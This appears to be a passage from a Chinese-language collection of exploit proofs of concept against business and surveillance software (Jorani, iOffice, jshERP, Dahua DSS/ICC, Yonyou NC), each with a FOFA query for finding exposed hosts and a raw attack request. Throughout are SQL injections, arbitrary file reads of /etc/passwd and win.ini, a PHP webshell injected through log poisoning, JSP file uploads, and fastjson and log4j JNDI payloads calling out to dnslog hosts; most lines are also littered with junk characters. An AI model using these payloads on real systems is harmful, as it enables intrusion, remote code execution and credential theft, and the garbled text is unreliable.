1 v3 `% \3 _! f! `! m9 U4 yGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1; b2 b9 @. r) k7 w
Host: 127.0.0.14 m9 G. C2 u2 b4 X
Pragma: no-cache6 `% v: `- S" K) [0 S
Cache-Control: no-cache
) i8 E6 p8 d! m! B# k; [Upgrade-Insecure-Requests: 1
9 j, @% p! D: X6 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ }$ ]' U' d! M q* P* |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Q: E0 |2 R6 T/ b' F8 |Accept-Encoding: gzip, deflate' p/ \ i- c/ ` q
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 m* ?3 ~' N3 s9 }Connection: close
" H% n/ g6 ^' `8 W& j& C$ T/ Z( w/ x9 b6 |, j
# m; g4 o, J- G& y12. Jorani < 1.0.2 远程命令执行0 y/ n Q0 @8 w$ Y# q% f
FOFA:title="Jorani"$ Q6 K3 t( n( }+ d0 b& E
第一步先拿到cookie, F% q T" `) F
GET /session/login HTTP/1.1% v. @) a! m5 r* w1 [, h
Host: 192.168.190.308 X. L0 ~' @, n
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
( V6 S T8 u8 Y6 @: t" tConnection: close! h) ~1 a( @0 S. I4 h% P2 h
Accept-Encoding: gzip8 L: L; s) w+ N( @# R9 i8 L$ j
D9 n8 G7 ?3 j7 P" H3 C# `: u
/ q6 p3 P9 U/ E) C7 _响应中csrf_cookie_jorani用于后续请求8 @- m1 s: x& A1 z$ z; J! @% c8 h
HTTP/1.1 200 OK
+ c1 u0 b5 C/ q* bConnection: close
" f( U' ?4 ~& o9 @; k- }6 `Cache-Control: no-store, no-cache, must-revalidate
" V1 h6 c. k2 K) O) @Content-Type: text/html; charset=UTF-8
0 Y. A' l% a+ x+ o: x' ^6 fDate: Tue, 24 Oct 2023 09:34:28 GMT; c1 f% d/ W7 Q" _: O+ ]8 L
Expires: Thu, 19 Nov 1981 08:52:00 GMT
/ N0 D% G" k1 R* H) z5 `" sLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT* Y) m& e8 [" x, L1 O
Pragma: no-cache$ k- r8 y+ g, U' q+ a0 }
Server: Apache/2.4.54 (Debian)5 Q( @. Q" ?. E% ^9 T4 q- A5 q
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/2 s0 L' t6 \& q! C; H
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
% J% L0 _& y) T+ K8 MVary: Accept-Encoding
( P W3 K6 n! c/ S$ v* r& X& A) A% f, l3 v3 f- p) o; E. q
& Q) ^; p. z4 X0 cPOST请求,执行函数并进行base64编码
0 I# A' Q. F" V+ ]: mPOST /session/login HTTP/1.10 J* M& I1 P0 ]0 C
Host: 192.168.190.30) ?& x, R* O# c- X) r3 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36# z, G0 U) s8 h5 x: g
Connection: close) r9 V( ?) E+ b4 K/ `2 T
Content-Length: 252
( g' d) @5 \% b6 AContent-Type: application/x-www-form-urlencoded
0 C- B& T4 z I8 b* x, F; BCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; ^7 d, Y( ?* @5 f
Accept-Encoding: gzip4 k! h+ G) v% x: ?4 r, d
1 {) j: |+ I5 w) e4 U' E" x
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
+ J9 }. U: e- x% n& G6 J6 F8 T1 h* L& {0 l# p/ y! y |4 p
& ]* Z- c" y) u) v6 n) Z% r& h: H! ~
0 j6 @, i2 U b
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串8 G4 w5 {" w# ~% \0 A
GET /pages/view/log-2023-10-24 HTTP/1.1
; B7 ?6 g2 X% P0 O( E% MHost: 192.168.190.30
, `( Z; A. c; }0 t" N7 x5 e, c1 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* e1 {5 F% b/ B2 J- gConnection: close% s& t2 W8 ^. m# u* z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 Y {, P, D; Z5 ~& X- HK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
! D/ z% ?2 H% z+ t: JX-REQUESTED-WITH: XMLHttpRequest
+ h: I$ o& a) RAccept-Encoding: gzip# w9 p& }; I# u3 Y! Q B8 U {3 i |
' A+ T0 |& H' I1 @+ {7 B
1 b& q! ]. L' c( H1 {0 O) C0 g13. 红帆iOffice ioFileDown任意文件读取* u3 y5 O* ]. a6 B+ b. \( H% [
FOFA:app="红帆-ioffice"
" s; U. i0 T+ ]- ^" rGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.12 T7 P/ t! U2 |' _& e/ P
Host: x.x.x.x4 z4 l4 b- q2 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 @; }" E: E. f u
Connection: close
! ?& ^2 n! X v, YAccept: */*
; k3 b* h7 P7 S8 J& N* h+ }Accept-Encoding: gzip
0 V- J/ F+ G5 L3 k5 }# {9 ?" \4 U0 H0 V
; [7 n4 l# \5 Q/ ?14. 华夏ERP(jshERP)敏感信息泄露7 I( q4 |5 @& T: J5 A
FOFA:body="jshERP-boot"/ o1 B% M7 a' @ U5 y2 |' H0 W
泄露内容包括用户名密码' N4 {. U2 o( S+ _
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1& o8 E$ d/ ?2 Z
Host: x.x.x.x& |3 ^2 ^. j' [7 b: u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ N# O& E9 Q# i( Y: M* X. c9 o* A+ R
Connection: close
! J! y6 c8 [8 I8 l6 MAccept: */*
$ x3 i0 t4 f I+ @4 t% kAccept-Language: en, h- G f+ o( y5 w7 W" F
Accept-Encoding: gzip
: t, P' E7 q* {! T+ _% ?5 b. S* ~6 n6 g" R. Y2 O+ _
- y) C# y n6 v15. 华夏ERP getAllList信息泄露
: y9 S4 |% [! d C4 A7 ]CVE-2024-0490. G5 j M( K# G7 R# e! P6 O0 U
FOFA:body="jshERP-boot": h# P O) N1 M7 I9 s8 Z/ d' ~
泄露内容包括用户名密码, P* i& g) D( @" `3 P
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 `% O7 o _8 j% SHost: 192.168.40.130:100$ l+ d3 g5 w0 }3 p6 O* q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
4 W0 u# E! B, Y+ L u& Y) bConnection: close, @% o* k( o6 g* a# T
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.82 a+ v& O% M5 {) V; e' F, M. O/ W
Accept-Language: en
4 O6 X' S5 N: dsec-ch-ua-platform: Windows
* T6 A X- e0 Q8 PAccept-Encoding: gzip
2 G, m0 l" [) _2 t! ~
- W9 @; n2 G" e: D% U# Q+ |2 B3 |3 t' f) v8 K6 s, k" k- [
16. 红帆HFOffice医微云SQL注入
5 Y9 @9 q H& V" Q% C9 @FOFA:title="HFOffice"8 T- j' E# b- j; ~
poc中调用函数计算1234的md5值
; ]8 z1 W0 b* O1 iGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
4 Y, N' A1 d; I! a: XHost: x.x.x.x, H8 F- i5 d( n- C
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 w0 h/ C) A+ eConnection: close* }+ {% d3 f$ M6 b4 L2 N' Y
Accept: */*
" i$ e# G. C0 d1 O2 b6 _Accept-Language: en- N8 E& a1 x6 C( o
Accept-Encoding: gzip
; u# C6 C- }+ ] c% h. [3 h
. \% g/ g$ M* e& w% r) `0 q; S* q$ B& t- v
17. 大华 DSS itcBulletin SQL 注入* I+ ?/ [% o, G9 `
FOFA:app="dahua-DSS"
7 L3 g% a! Q0 j" c' uPOST /portal/services/itcBulletin?wsdl HTTP/1.1) Y. s* \9 E6 T* J0 z
Host: x.x.x.x
6 I$ D1 v& i1 E9 o) U" f5 P4 t4 f5 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. T1 N# |: v/ Y" f: M
Connection: close
, V' S/ ]% [5 E6 o l% UContent-Length: 345: J1 g0 `+ G+ J0 Y5 u5 i9 T
Accept-Encoding: gzip( ]- J2 Z+ M* y3 {
+ {3 L [& s6 m; [ z- L
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 c' f( z7 q# p! _5 }<s11:Body>0 O" C6 G+ }; k3 L# ]( E
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
4 P3 Q8 p# s9 i$ E9 x/ ~ <netMarkings> P+ u' e' z- F! U+ X- D
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
* {5 J k% U0 @$ S1 l4 q% n </netMarkings>0 X- @4 ~' x6 O/ ^
</ns1:deleteBulletin>% c; `, P; b6 o" }
</s11:Body>8 A2 ^$ d# s I" F- f, Z
</s11:Envelope>
0 ~: X( `0 \# t3 a2 r; d: o. M2 c: q; D
0 N+ l* I- H4 v3 v' Y4 k- r0 f18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
' Y; y: T+ ^$ u& ]2 B( K/ b) N0 iFOFA:app="dahua-DSS"
# W' p; s# u! r n' [" zGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
3 T& X0 I/ e2 _' t/ mHost: your-ip
: q' \& i0 c7 C" v0 I; oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 X. o& C. ]' L' W0 {
Accept-Encoding: gzip, deflate4 w! S: K' ]* ~
Accept: */*
+ V0 @2 g' C2 A9 X$ Z8 p9 YConnection: keep-alive
% _7 H% U% ~$ S0 _7 a
: p- b6 s2 a1 X# ^2 m& f8 }" A; ^1 @" D9 D% q
8 n! v5 N' D8 B, g2 b$ z; o
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
! p g# F3 ^5 l# s0 h5 u% K) sFOFA:app="dahua-DSS" w. `0 ^6 W! U' X6 O
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.18 Q# K) s! I1 ?8 K
Host:1 s7 v5 }% h- o' ^7 ` @% j
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 w- X& i7 ~1 k$ y% z$ g5 jAccept-Encoding: gzip, deflate( N Q1 N. D- p6 H6 R4 ]
Accept: */*/ C1 Z- R" u' o7 j1 P$ u& G
Connection: keep-alive
s+ w8 h m6 T$ f3 a! h' D- x- J% x6 B. j7 L7 D
& q- T% ~# B: U, k$ m
20. 大华ICC智能物联综合管理平台任意文件读取+ [; Z( ^( O) @; s
FOFA:body="*客户端会小于800*"
/ M6 Y5 P$ P% R2 U9 t* HGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1/ `" b! u0 x; h
Host: x.x.x.x
( A. k& f* Y8 ZUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ a1 ^' b2 L; M# a: D% U
Connection: close
/ o) }0 S; u4 f( r0 ^0 dAccept: */*
, P# e, X( S1 F. P1 X5 K0 RAccept-Language: en ?( K4 G' u5 H, E/ r' A; F& |
Accept-Encoding: gzip" G; n* T1 B9 V! \: V/ C. X
) r5 M8 L: `" c' L7 p3 C3 `4 H
7 q' E4 q! ~# a6 ^* a) D
21. 大华ICC智能物联综合管理平台random远程代码执行
* X! l0 }2 O% s- sFOFA:icon_hash="-1935899595"
4 N1 T+ l" J/ {- rPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 q4 n" D2 [3 c& e
Host: x.x.x.x
( Z/ K* d3 W1 D$ }' BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# ]! F* d" t$ u4 E5 ^/ kContent-Length: 161
% p8 j4 g- T6 D! d0 Z$ zAccept-Encoding: gzip: @. [! c% s3 \4 f+ p/ I8 l
Connection: close
9 Y, a) Q& c r1 K! {' ]8 RContent-Type: application/json;charset=utf-8
: ~, X; b! n$ n& m/ E( H+ P0 o/ `) R' g/ X& ]' a. W# w
{2 I' l5 V! O, s
"a":{
/ }$ Q' \, s6 y& f0 o7 Q "@type":"com.alibaba.fastjson.JSONObject",
* m& R9 O9 E; X! Y {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
4 Q$ J. i+ G8 C1 F* S( R6 i }""
; r7 J; r% j, Q8 k: g3 U7 |}
7 ]' p" [. C9 x/ J) c2 s& L
: A2 O6 E& @9 ?- R L2 _
4 J# A& g, H3 D8 h7 i9 }" F+ l" D22. 大华ICC智能物联综合管理平台 log4j远程代码执行. w" w0 f7 A0 P" B' A5 @
FOFA:icon_hash="-1935899595") N* ]) P. A% R4 F' V0 A; x
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.18 D8 x9 j; R! p, M
Host: your-ip8 ?+ x- r6 R4 [1 K- G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) C& }, V% p2 M) J! xContent-Type: application/json;charset=utf-8$ k% L% i' O" Y
4 G% |. W' ^ A1 L' P! q{+ b! b. h& o+ E2 \0 y
"loginName":"${jndi:ldap://dnslog}"# `* ]% ?' y! o* \$ m+ D
}+ U: o; `( q( \" l: @
4 L, V6 Q! C3 P2 |! @
s" P6 M$ T: q( H; m& ?: N5 @+ W1 [( s- R7 M
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ ~$ U! n) s( n9 j9 v* J5 ^: k5 B* s: {FOFA:icon_hash="-1935899595"
- T4 B: F j( e# LPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% Z7 g. g3 @, _1 P0 X
Host: your-ip
: i y8 C& k8 G- S$ X+ K0 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# X _( W* ~7 @3 D/ `. g
Content-Type: application/json;charset=utf-8
0 d! a+ X$ r# OAccept-Encoding: gzip
5 n, x* v' z1 _* zConnection: close8 S* Q' a$ A; Q: a1 S
+ B. J* {) e c4 J{
8 J7 Q% t( [+ P5 A8 y "a":{
, m9 I" s% V* [3 n; h# i "@type":"com.alibaba.fastjson.JSONObject",7 a$ k4 W. m; f" v8 V4 _6 v% s& u' t
{"@type":"java.net.URL","val":"http://DNSLOG"}- p2 Q2 c( O$ }
}""( O# X; p3 Z4 Q/ q7 J9 i3 b2 s
}, o- x+ g$ c3 S+ x
% x3 u. x/ P' K0 [% ]( w
9 m( S# }" s9 B9 W% q t+ }% u24. 用友NC 6.5 accept.jsp任意文件上传
9 l: T0 W a" P% t" L) G! w: EFOFA:icon_hash="1085941792"
2 P: h: ^+ R( \$ NPOST /aim/equipmap/accept.jsp HTTP/1.1, G' Z z- m4 x5 g
Host: x.x.x.x3 [) \9 ?0 A# K2 m7 f9 U0 y
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) ?. X9 x6 ?$ S* c' \5 L* _: T5 `9 B
Connection: close
. b( x {5 c' B# B) f# qContent-Length: 4491 S& I j! ~# ~0 `" U9 n
Accept: */*0 g% f* Y' Q' j, F/ W
Accept-Encoding: gzip8 ?" ]( o) I* l. _- z C
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc Y# E$ M! R" O- u2 W- B; j
! }' s8 D S" J0 A
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. e. Q9 [4 r( M
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"( y' ?. H& l4 \3 a3 r, z3 x& @, e
Content-Type: text/plain
. g4 `( w( O+ p# a# k8 P- B2 u6 Q2 `4 H
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
4 W# v% h+ G8 H# J: e% V-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 j9 m$ `( ~7 C' dContent-Disposition: form-data; name="fname"! t6 K: R9 {& T8 E8 g: {1 p Q
, u/ t" M J. X3 q\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp% E4 O/ O }6 z6 `
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
& d* p- u3 z% m- p7 g
) m$ |1 b! K1 b% T
~0 ?& h, r; ~% o( w7 ~25. 用友NC registerServlet JNDI 远程代码执行
- l: ~( Y+ V+ e3 [0 V# IFOFA:app="用友-UFIDA-NC"
1 F t* c K6 r/ }+ VPOST /portal/registerServlet HTTP/1.1
7 m/ I- F- i$ W6 {Host: your-ip
5 k) @4 j5 |7 H$ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0* K) \6 m! U( v& n, d2 c& U$ _- h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
; ^, B O( p1 w4 B1 ]+ KAccept-Encoding: gzip, deflate3 U! J3 Y) h# a
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6 ]% e1 a1 P6 u5 O" `: X s7 Q
Content-Type: application/x-www-form-urlencoded
! R) Y; q! J- a' ^$ b+ d1 f$ W$ W+ `( Y& m% {% L
type=1&dsname=ldap://dnslog
: G$ L$ Q: |# d* d( {5 M8 _- ^! q' B% K1 T6 T4 k3 z
- Q7 Y6 |' v8 W" w/ F9 `* E; v
. ^+ {9 q& Q P! O8 l26. 用友NC linkVoucher SQL注入
1 s. R( F2 v) M" a& iFOFA:app="用友-UFIDA-NC"/ O& K- y- [; K7 c J
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.14 o: S5 G$ h0 x8 o0 m
Host: your-ip
' Z f! ]( E& l+ s( R8 _6 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ I' x7 z- \7 `; y9 p5 N
Content-Type: application/x-www-form-urlencoded; ~2 }* q* i1 {" l) e1 V. Y& `
Accept-Encoding: gzip, deflate
# o6 ~# a3 \" cAccept: */*7 V+ n0 i" U) E+ R) \
Connection: keep-alive1 b8 B% e+ A0 u, K2 i# ^* U
$ O; [6 i# [' b* t$ B% Z
" o& u! P3 {% ]4 H1 a8 z27. 用友 NC showcontent SQL注入
& y3 ~4 r+ o3 y2 t* jFOFA:icon_hash="1085941792"$ ]' y1 o3 [; j9 R# _
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.17 J5 w$ F& p+ i7 x
Host: your-ip1 L5 k8 X% d2 W# [: r# B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 z% M7 u8 u" g) h! j' g& U2 P
Accept-Encoding: identity
: ^$ Z- X& U0 ]: {$ fConnection: close% x, p) E3 j3 k& u2 f
Content-Type: text/xml; charset=utf-8; _! _/ h0 g; ?- K. @) T7 o5 S
& e- T# P2 K6 [
B% ]. u# Z7 z k( ` g2 h8 s28. 用友NC grouptemplet 任意文件上传. N# s8 [- M8 @7 }& e) h& ~. t
FOFA:icon_hash="1085941792"* ^" O# H- F0 N8 x L- G c5 l
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
6 C$ J6 X5 A. w/ f9 W, g7 PHost: x.x.x.x
& B& ?+ v _( G2 t2 y& {9 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 M1 O, L' n/ Y6 M" ~
Connection: close( A8 _( S, q3 D6 u( Q! l! N% ]3 E
Content-Length: 268
: `: G& L, X6 u* L1 wContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% i6 C, x) u2 uAccept-Encoding: gzip4 w I& t1 N) T' H* z- b
6 M( x7 O( T8 c) l4 m6 K
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
# Z7 q/ n" P$ J; r/ A; w% nContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp". q0 b6 z" A" T% V; N/ b
Content-Type: application/octet-stream( V) y3 {0 e! s2 \; E# A
1 G: V7 j4 [ b2 {$ @<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>; L+ c$ u9 ~5 H
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--; X; F! P' B, n) p6 P b+ R
; Z H c7 @. A8 t T/ J7 H
% A* {* L2 i7 {& |
/uapim/static/pages/nc/head.jsp
, }$ B) s7 `1 Q$ x
0 D b1 d# ~3 A9 [+ \, }29. 用友NC down/bill SQL注入0 E+ G" q: G0 u$ m
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; K p+ z, [3 I4 p1 ~- u3 }GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% X6 B* V1 O& A7 ^Host: your-ip1 @( {% k; o7 d7 }, `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ I. [ U) {, |$ J0 m) u
Content-Type: application/x-www-form-urlencoded
1 C: ]" @& Z; K( lAccept-Encoding: gzip, deflate9 I0 q0 }# f$ Z& Q
Accept: */*
5 s% _" ^- ?1 b/ e- W) BConnection: keep-alive# R F- ^5 A2 o) n
; m7 n% z9 M8 D9 B; k
. y# `3 y8 ^6 V* c) V
30. 用友NC importPml SQL注入
+ B1 f5 C1 N6 j- Y: _- B& dFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
( _8 ], q3 D& N- T' i TPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1- x$ Q, G6 D- O& o( l, P5 m$ k- z5 Z
Host: your-ip" S/ Y8 V/ G' w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
& |: A/ r4 A! P; [$ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
8 f5 v+ y2 H+ u2 P+ D3 y# ?) aConnection: close' ?8 B2 t) z, e @0 {" o( @$ p
5 O- J6 T8 k4 ~3 ~------WebKitFormBoundaryH970hbttBhoCyj9V) ?/ x* O5 I6 t% r* Q, j7 a, o
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"! Z* h; s4 Y' y2 D0 w5 k; M# w
Content-Type: image/jpeg
" p7 D$ j U" w" }------WebKitFormBoundaryH970hbttBhoCyj9V--( C6 B" |, l/ c$ f6 z5 Z4 \
, \6 Z& \5 D3 q" P$ m' w
0 C6 H2 e, ~' Z: V/ A5 M* U31. 用友NC runStateServlet SQL注入
1 d. A8 M8 I' O8 H& H; g5 p9 cversion<=6.5
; t1 f0 h( a. B7 C+ R# L1 ~3 FFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 |: g9 o6 R; hGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! u% U/ m6 Y- E- S* eHost: host: }+ p, o- e; D' R7 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
2 p$ X! Z' d. M/ D) ZContent-Type: application/x-www-form-urlencoded
o" a! m! }5 Q$ U0 Y; f$ R' @. _) K0 ^" z2 T
. k8 l9 c% |! K+ I5 Z32. 用友NC complainbilldetail SQL注入
0 I$ s7 u+ R9 [6 z4 `6 `version= NC633、NC65( Z) w0 `) O$ @) a2 x
FOFA:app="用友-UFIDA-NC"
! Y8 H* A5 j& q7 f+ q7 J( O/ s" zGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1# q( N5 K8 V; |5 s5 b- r9 _; f4 ~
Host: your-ip
, t6 v( X3 Z/ S9 P6 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ C! Y9 V. d8 p$ h' V# X. e$ zContent-Type: application/x-www-form-urlencoded0 B9 S) K" G. ?7 T* q7 ]* p
Accept-Encoding: gzip, deflate
; H1 e- R* ~/ K! q+ l0 \Accept: */*( x( E X3 O9 Z: Q: Y
Connection: keep-alive2 r& A, c7 w( e6 j$ R. Y
7 G8 j4 D6 ?% M( L4 e9 P7 l( g) h, W& g; O4 @2 k( | m
33. 用友NC downTax/download SQL注入
, M1 v$ y, J; ~6 tversion:NC6.5FOFA:app="用友-UFIDA-NC"
3 s: h; ]" u+ s! I1 S/ b# J" u/ QGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ v( N( B6 t }, s* k( qHost: your-ip% t' s3 w; c6 u d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 Y. Z8 Z1 y' S* N+ g2 r8 l, X7 K5 n
Content-Type: application/x-www-form-urlencoded) L% a/ ~: U# [4 f
Accept-Encoding: gzip, deflate0 J$ U/ M. ~8 i- g
Accept: */*
* w C# V; f. XConnection: keep-alive4 t: M. O/ ~& v6 R( v: { d4 P" g
% o: v% `* Q2 G( C5 V) F- S
; g2 K# k% r4 {6 e" x34. 用友NC warningDetailInfo接口SQL注入8 o, ~ t+ h+ O) j1 K
FOFA:app="用友-UFIDA-NC"; ]! _# J- g& U/ |% C( B4 S) U/ d
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! B- ~9 c6 j, @/ BHost: your-ip
% H: \+ W% k/ s$ F% oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 f7 k- t h- ~& ~8 F
Content-Type: application/x-www-form-urlencoded) I- A6 [$ k4 @& e9 C q9 J
Accept-Encoding: gzip, deflate! Q2 L8 E* U1 G' R& J% X9 R
Accept: */*- Z9 H7 `3 o) f" e% H1 C ?/ E
Connection: keep-alive: Y0 X! k" |. r* ?: i' s* g
6 Q6 H- j) V/ k, {9 _
8 l4 c! N0 ~: e
35. 用友NC-Cloud importhttpscer任意文件上传
# l# r3 e; o1 S* lFOFA:app="用友-NC-Cloud"
- }& R) ?" o% X; FPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
" ?2 E- y* b0 ]# E6 _Host: 203.25.218.166:88889 a: u/ F/ F$ x. V8 w0 }
